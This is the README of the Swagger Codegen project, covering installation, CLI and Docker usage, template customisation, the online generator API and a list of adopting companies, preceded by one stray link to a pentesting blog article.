- [pentest.blog,windows-privilege-escalation-methods-for-pentesters](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/)
|
# Swagger Code Generator
- Master: [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)
[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)
[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)
[![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen)
- 2.3.0: [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/2.3.0.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)
[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea/2.3.0.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)
[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=2.3.0&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)
[![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project)
[![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen)
:star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star:
:notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover:
:warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning:
:rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket:
## Overview
This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported:
- **API clients**: **ActionScript**, **Apex**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Kotlin**, **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **PowerShell**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, jQuery, Node)
- **Server stubs**: **C#** (ASP.NET Core, NancyFx), **C++** (Pistache, Restbed), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy, Play Framework), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra)
- **API documentation generators**: **HTML**, **Confluence Wiki**
- **Others**: **JMeter**
Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project.
# Table of contents
- [Swagger Code Generator](#swagger-code-generator)
- [Overview](#overview)
- [Table of Contents](#table-of-contents)
- Installation
- [Compatibility](#compatibility)
- [Prerequisites](#prerequisites)
- [OS X Users](#os-x-users)
- [Building](#building)
- [Docker](#docker)
- [Build and run](#build-and-run-using-docker)
- [Run docker in Vagrant](#run-docker-in-vagrant)
- [Public Docker image](#public-docker-image)
- [Homebrew](#homebrew)
- [Getting Started](#getting-started)
- Generators
- [To generate a sample client library](#to-generate-a-sample-client-library)
- [Generating libraries from your server](#generating-libraries-from-your-server)
- [Modifying the client library format](#modifying-the-client-library-format)
- [Making your own codegen modules](#making-your-own-codegen-modules)
- [Where is Javascript???](#where-is-javascript)
- [Generating a client from local files](#generating-a-client-from-local-files)
- [Customizing the generator](#customizing-the-generator)
- [Validating your OpenAPI Spec](#validating-your-openapi-spec)
- [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation)
- [Generating static html api documentation](#generating-static-html-api-documentation)
- [To build a server stub](#to-build-a-server-stub)
- [To build the codegen library](#to-build-the-codegen-library)
- [Workflow Integration](#workflow-integration)
- [Github Integration](#github-integration)
- [Online Generators](#online-generators)
- [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution)
- [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen)
- [Presentations/Videos/Tutorials/Books](#presentationsvideostutorialsbooks)
- [Swagger Codegen Core Team](#swagger-codegen-core-team)
- [Swagger Codegen Evangelist](#swagger-codegen-evangelist)
- [License](#license)
## Compatibility
The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification:
Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes
-------------------------- | ------------ | -------------------------- | -----
2.3.0 (upcoming minor release) | Apr/May 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes
2.2.3 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release without breaking changes
[2.2.2](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.2) (**current stable**) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2)
[2.2.1](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.1) | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1)
[2.1.6](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.1.6) | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6)
2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17)
1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1)
### Prerequisites
If you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum):
```
wget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar -O swagger-codegen-cli.jar
java -jar swagger-codegen-cli.jar help
```
On a mac, it's even easier with `brew`:
```
brew install swagger-codegen
```
To build from source, you need the following installed and available in your $PATH:
* [Java 7 or 8](http://java.oracle.com)
* [Apache maven 3.3.3 or greater](http://maven.apache.org/)
#### OS X Users
Don't forget to install Java 7 or 8. You probably have 1.6.
Export JAVA_HOME in order to use the supported Java version:
```
export JAVA_HOME=`/usr/libexec/java_home -v 1.8`
export PATH=${JAVA_HOME}/bin:$PATH
```
### Building
After cloning the project, you can build it from source with this command:
```
mvn clean package
```
### Homebrew
To install, run `brew install swagger-codegen`
Here is an example usage:
```
swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/
```
### Docker
#### Development in docker
You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen`
in the docker container. It also maps `~/.m2/repository` to the appropriate container location.
To execute `mvn package`:
```
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
./run-in-docker.sh mvn package
```
Build artifacts are now accessible in your working directory.
Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example:
```
./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli
./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli
./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client
./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \
-l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore
```
#### Run Docker in Vagrant
Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads).
```
git clone http://github.com/swagger-api/swagger-codegen.git
cd swagger-codegen
vagrant up
vagrant ssh
cd /vagrant
./run-in-docker.sh mvn package
```
#### Public Pre-built Docker images
- https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service)
- https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI)
##### Swagger Generator Docker Image
The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code.
Example usage (note this assumes `jq` is installed for command line processing of JSON):
```
# Start container and save the container id
CID=$(docker run -d swaggerapi/swagger-generator)
# allow for startup
sleep 5
# Get the IP of the running container
GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID)
# Execute an HTTP request and store the download link
RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"')
# Download the generated zip and redirect to a file
curl $RESULT > result.zip
# Shutdown the swagger generator image
docker stop $CID && docker rm $CID
```
In the example above, `result.zip` will contain the generated client.
##### Swagger Codegen CLI Docker Image
The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version.
To generate code with this image, you'll need to mount a local location as a volume.
Example:
```
docker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l go \
-o /local/out/go
```
The generated code will be located under `./out/go` in the current directory.
## Getting Started
To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following
```sh
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
mvn clean package
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l php \
-o /var/tmp/php_api_client
```
(if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`)
You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar)
To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate`
To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php`
## Generators
### To generate a sample client library
You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows:
```
./bin/java-petstore.sh
```
(On Windows, run `.\bin\windows\java-petstore.bat` instead)
This will run the generator with this command:
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java
```
with a number of options. You can get the options with the `help generate` command (below only shows partal results):
```
NAME
swagger-codegen-cli generate - Generate code with chosen lang
SYNOPSIS
swagger-codegen-cli generate
[(-a <authorization> | --auth <authorization>)]
[--additional-properties <additional properties>]
[--api-package <api package>] [--artifact-id <artifact id>]
[--artifact-version <artifact version>]
[(-c <configuration file> | --config <configuration file>)]
[-D <system properties>] [--group-id <group id>]
(-i <spec file> | --input-spec <spec file>)
[--import-mappings <import mappings>]
[--instantiation-types <instantiation types>]
[--invoker-package <invoker package>]
(-l <language> | --lang <language>)
[--language-specific-primitives <language specific primitives>]
[--library <library>] [--model-package <model package>]
[(-o <output directory> | --output <output directory>)]
[(-s | --skip-overwrite)]
[(-t <template directory> | --template-dir <template directory>)]
[--type-mappings <type mappings>] [(-v | --verbose)]
OPTIONS
-a <authorization>, --auth <authorization>
adds authorization headers when fetching the swagger definitions
remotely. Pass in a URL-encoded string of name:header with a comma
separating multiple values
...... (results omitted)
-v, --verbose
verbose mode
```
You can then compile and run the client, as well as unit tests against it:
```
cd samples/client/petstore/java
mvn package
```
Other languages have petstore samples, too:
```
./bin/android-petstore.sh
./bin/java-petstore.sh
./bin/objc-petstore.sh
```
### Generating libraries from your server
It's just as easy--just use the `-i` flag to point to either a server or file.
### Modifying the client library format
Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own.
You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy.
### Making your own codegen modules
If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries:
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \
-o output/myLibrary -n myClientCodegen -p com.my.company.codegen
```
This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic.
You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such:
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
For Windows users, you will need to use `;` instead of `:` in the classpath, e.g.
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library:
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \
io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\
-i http://petstore.swagger.io/v2/swagger.json \
-o myClient
```
### Where is Javascript???
See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require
static code generation.
There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification.
:exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala.
### Generating a client from local files
If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument
to the code generator like this:
```
-i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json
```
Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane.
### Selective generation
You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output:
The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated:
```
# generate only models
java -Dmodels {opts}
# generate only apis
java -Dapis {opts}
# generate only supporting files
java -DsupportingFiles
# generate models and supporting files
java -Dmodels -DsupportingFiles
```
To control the specific files being generated, you can pass a CSV list of what you want:
```
# generate the User and Pet models only
-Dmodels=User,Pet
# generate the User model and the supportingFile `StringUtil.java`:
-Dmodels=User -DsupportingFiles=StringUtil.java
```
To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`.
These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`):
```
# generate only models (with tests and documentation)
java -Dmodels {opts}
# generate only models (with tests but no documentation)
java -Dmodels -DmodelDocs=false {opts}
# generate only User and Pet models (no tests and no documentation)
java -Dmodels=User,Pet -DmodelTests=false {opts}
# generate only apis (without tests)
java -Dapis -DapiTests=false {opts}
# generate only apis (modelTests option is ignored)
java -Dapis -DmodelTests=false {opts}
```
When using selective generation, _only_ the templates needed for the specific generation will be used.
### Ignore file format
Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with.
The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code.
Examples:
```
# Swagger Codegen Ignore
# Lines beginning with a # are comments
# This should match build.sh located anywhere.
build.sh
# Matches build.sh in the root
/build.sh
# Exclude all recursively
docs/**
# Explicitly allow files excluded by other rules
!docs/UserApi.md
# Recursively exclude directories named Api
# You can't negate files below this directory.
src/**/Api/
# When this file is nested under /Api (excluded above),
# this rule is ignored because parent directory is excluded by previous rule.
!src/**/PetApiTests.cs
# Exclude a single, nested file explicitly
src/IO.Swagger.Test/Model/AnimalFarmTests.cs
```
The `.swagger-codegen-ignore` file must exist in the root of the output directory.
### Customizing the generator
There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc:
```
$ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/
AbstractJavaJAXRSServerCodegen.java
AbstractTypeScriptClientCodegen.java
... (results omitted)
TypeScriptAngularClientCodegen.java
TypeScriptNodeClientCodegen.java
```
Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values.
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java \
-c path/to/config.json
```
and `config.json` contains the following as an example:
```
{
"apiPackage" : "petstore"
}
```
Supported config options can be different per language. Running `config-help -l {lang}` will show available options.
**These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}`**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it)
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java
```
Output
```
CONFIG OPTIONS
modelPackage
package for generated models
apiPackage
package for generated api classes
...... (results omitted)
library
library template (sub-template) to use:
jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2
jersey2 - HTTP client: Jersey client 2.6
feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3
okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1
retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0)
retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2)
```
Your config file for Java can look like
```json
{
"groupId":"com.my.company",
"artifactId":"MyClient",
"artifactVersion":"1.2.0",
"library":"feign"
}
```
For all the unspecified options default values will be used.
Another way to override default options is to extend the config class for the specific language.
To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java:
```java
package com.mycompany.swagger.codegen;
import io.swagger.codegen.languages.*;
public class MyObjcCodegen extends ObjcClientCodegen {
static {
PREFIX = "HELO";
}
}
```
and specify the `classname` when running the generator:
```
-l com.mycompany.swagger.codegen.MyObjcCodegen
```
Your subclass will now be loaded and overrides the `PREFIX` value in the superclass.
### Bringing your own models
Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell
the codegen what _not_ to create. When doing this, every location that references a specific model will
refer back to your classes. Note, this may not apply to all languages...
To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such:
```
--import-mappings Pet=my.models.MyPet
```
Or for multiple mappings:
```
Pet=my.models.MyPet,Order=my.models.MyOrder
```
### Validating your OpenAPI Spec
You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example:
http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json
### Generating dynamic html api documentation
To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation:
```
cd samples/dynamic-html/
npm install
node .
```
Which launches a node.js server so the AJAX calls have a place to go.
### Generating static html api documentation
To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem:
```
cd samples/html/
open index.html
```
### To build a server stub
Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information.
### To build the codegen library
This will create the swagger-codegen library from source.
```
mvn package
```
Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts
## Workflow integration
You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target.
## GitHub Integration
To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example:
1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/)
2) Generate the SDK
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \
--git-user-id "wing328" \
--git-repo-id "petstore-perl" \
--release-note "Github integration demo" \
-o /var/tmp/perl/petstore
```
3) Push the SDK to GitHub
```
cd /var/tmp/perl/petstore
/bin/sh ./git_push.sh
```
## Online generators
One can also generate API client or server using the online generators (https://generator.swagger.io)
For example, to generate Ruby API client, simply send the following HTTP request using curl:
```
curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby
```
Then you will receieve a JSON response with the URL to download the zipped code.
To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body:
```
{
"options": {},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`:
For example, `curl https://generator.swagger.io/api/gen/clients/python` returns
```
{
"packageName":{
"opt":"packageName",
"description":"python package name (convention: snake_case).",
"type":"string",
"default":"swagger_client"
},
"packageVersion":{
"opt":"packageVersion",
"description":"python package version.",
"type":"string",
"default":"1.0.0"
},
"sortParamsByRequiredFlag":{
"opt":"sortParamsByRequiredFlag",
"description":"Sort method arguments to place required parameters before optional parameters.",
"type":"boolean",
"default":"true"
}
}
```
To set package name to `pet_store`, the HTTP body of the request is as follows:
```
{
"options": {
"packageName": "pet_store"
},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
and here is the curl command:
```
curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python
```
Instead of using `swaggerUrl` with an URL to the OpenAPI/Swagger spec, one can include the spec in the JSON payload with `spec`, e.g.
```
{
"options": {},
"spec": {
"swagger": "2.0",
"info": {
"version": "1.0.0",
"title": "Test API"
},
...
}
}
```
Guidelines for Contribution
---------------------------
Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md)
Companies/Projects using Swagger Codegen
----------------------------------------
Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page.
- [Activehours](https://www.activehours.com/)
- [Acunetix](https://www.acunetix.com/)
- [Atlassian](https://www.atlassian.com/)
- [Autodesk](http://www.autodesk.com/)
- [Avenida Compras S.A.](https://www.avenida.com.ar)
- [AYLIEN](http://aylien.com/)
- [Balance Internet](https://www.balanceinternet.com.au/)
- [beemo](http://www.beemo.eu)
- [bitly](https://bitly.com)
- [BeezUP](http://www.beezup.com)
- [Box](https://box.com)
- [Bufferfly Network](https://www.butterflynetinc.com/)
- [Cachet Financial](http://www.cachetfinancial.com/)
- [carpolo](http://www.carpolo.co/)
- [CloudBoost](https://www.CloudBoost.io/)
- [Cisco](http://www.cisco.com/)
- [Conplement](http://www.conplement.de/)
- [Cummins](http://www.cummins.com/)
- [Cupix](http://www.cupix.com)
- [DBBest Technologies](https://www.dbbest.com)
- [DecentFoX](http://decentfox.com/)
- [DocRaptor](https://docraptor.com)
- [DocuSign](https://www.docusign.com)
- [Ergon](http://www.ergon.ch/)
- [Dell EMC](https://www.emc.com/)
- [eureka](http://eure.jp/)
- [everystory.us](http://everystory.us)
- [Expected Behavior](http://www.expectedbehavior.com/)
- [Fastly](https://www.fastly.com/)
- [Flat](https://flat.io)
- [Finder](http://en.finder.pl/)
- [FH Münster - University of Applied Sciences](http://www.fh-muenster.de)
- [Fotition](https://www.fotition.com/)
- [Gear Zero Network](https://www.gearzero.ca)
- [General Electric](https://www.ge.com/)
- [Germin8](http://www.germin8.com)
- [GigaSpaces](http://www.gigaspaces.com)
- [goTransverse](http://www.gotransverse.com/api)
- [GraphHopper](https://graphhopper.com/)
- [Gravitate Solutions](http://gravitatesolutions.com/)
- [HashData](http://www.hashdata.cn/)
- [Hewlett Packard Enterprise](https://hpe.com)
- [High Technologies Center](http://htc-cs.com)
- [IBM](https://www.ibm.com)
- [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications)
- [Individual Standard IVS](http://www.individual-standard.com)
- [Intent HQ](http://www.intenthq.com)
- [Interactive Intelligence](http://developer.mypurecloud.com/)
- [Kabuku](http://www.kabuku.co.jp/en)
- [Kurio](https://kurio.co.id)
- [Kuroi](http://kuroiwebdesign.com/)
- [Kuary](https://kuary.com/)
- [Kubernetes](https://kubernetes.io/)
- [LANDR Audio](https://www.landr.com/)
- [Lascaux](http://www.lascaux.it/)
- [Leica Geosystems AG](http://leica-geosystems.com)
- [LiveAgent](https://www.ladesk.com/)
- [LXL Tech](http://lxltech.com)
- [Lyft](https://www.lyft.com/developers)
- [MailMojo](https://mailmojo.no/)
- [Mindera](http://mindera.com/)
- [Mporium](http://mporium.com/)
- [Neverfail](https://neverfail.com/)
- [nViso](http://www.nviso.ch/)
- [Okiok](https://www.okiok.com)
- [Onedata](http://onedata.org)
- [OrderCloud.io](http://ordercloud.io)
- [OSDN](https://osdn.jp)
- [PagerDuty](https://www.pagerduty.com)
- [PagerTree](https://pagertree.com)
- [Pepipost](https://www.pepipost.com)
- [Plexxi](http://www.plexxi.com)
- [Pixoneye](http://www.pixoneye.com/)
- [PostAffiliatePro](https://www.postaffiliatepro.com/)
- [PracticeBird](https://www.practicebird.com/)
- [Prill Tecnologia](http://www.prill.com.br)
- [QAdept](http://qadept.com/)
- [QuantiModo](https://quantimo.do/)
- [QuickBlox](https://quickblox.com/)
- [Rapid7](https://rapid7.com/)
- [Reload! A/S](https://reload.dk/)
- [REstore](https://www.restore.eu)
- [Revault Sàrl](http://revault.ch)
- [Riffyn](https://riffyn.com)
- [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html)
- [Saritasa](https://www.saritasa.com/)
- [SAS](https://www.sas.com)
- [SCOOP Software GmbH](http://www.scoop-software.de)
- [Shine Solutions](https://shinesolutions.com/)
- [Simpfony](https://www.simpfony.com/)
- [Skurt](http://www.skurt.com)
- [Slamby](https://www.slamby.com/)
- [SmartRecruiters](https://www.smartrecruiters.com/)
- [snapCX](https://snapcx.io)
- [SPINEN](http://www.spinen.com)
- [SRC](https://www.src.si/)
- [Stardog Ventures](https://www.stardog.io)
- [Stingray](http://www.stingray.com)
- [StyleRecipe](http://stylerecipe.co.jp)
- [Svenska Spel AB](https://www.svenskaspel.se/)
- [Switch Database](https://www.switchdatabase.com/)
- [TaskData](http://www.taskdata.com/)
- [ThoughtWorks](https://www.thoughtworks.com)
- [Trexle](https://trexle.com/)
- [Upwork](http://upwork.com/)
- [uShip](https://www.uship.com/)
- [VMware](https://vmware.com/)
- [Viavi Solutions Inc.](https://www.viavisolutions.com)
- [W.UP](http://wup.hu/?siteLang=en)
- [Wealthfront](https://www.wealthfront.com/)
- [Webever GmbH](https://www.webever.de/)
- [WEXO A/S](https://www.wexo.dk/)
- [XSky](http://www.xsky.com/)
- [Yelp](http://www.yelp.com/)
- [Zalando](https://tech.zalando.com)
- [ZEEF.com](https://zeef.com/)
Presentations/Videos/Tutorials/Books
----------------------------------------
- 2015/07/28 - [Enriching RESTful Services with Swagger](https://blog.philipphauer.de/enriching-restful-services-swagger/) by [Philipp Hauer](https://blog.philipphauer.de/)
- 2015/11/11 - [Generate client stubs & document your REST-API using Swagger & Spring](https://www.youtube.com/watch?v=43GhBbP--oI) by [Johannes Fiala](https://github.com/jfiala) @ Devoxx Belgium 2015
- 2015/12/03 - [こんなに簡単! Swagger Codegenのカスタマイズ](http://qiita.com/Quramy/items/c583f3213f0b77ff1bac) by [Quramy](http://qiita.com/Quramy)
- 2016/01/12 - [Generate client side code using Swagger Codegen](http://rnavagamuwa.com/open-source/generate-client-side-code-using-swagger-codegen/) by [RNAVAGAMUWA](http://rnavagamuwa.com/author/admin/)
- 2016/01/15 - [How to end manual REST-API client coding](https://www.youtube.com/watch?v=RzZRdqZp6Oo) by [Johannes Fiala](https://github.com/jfiala) @ dotJS 2015
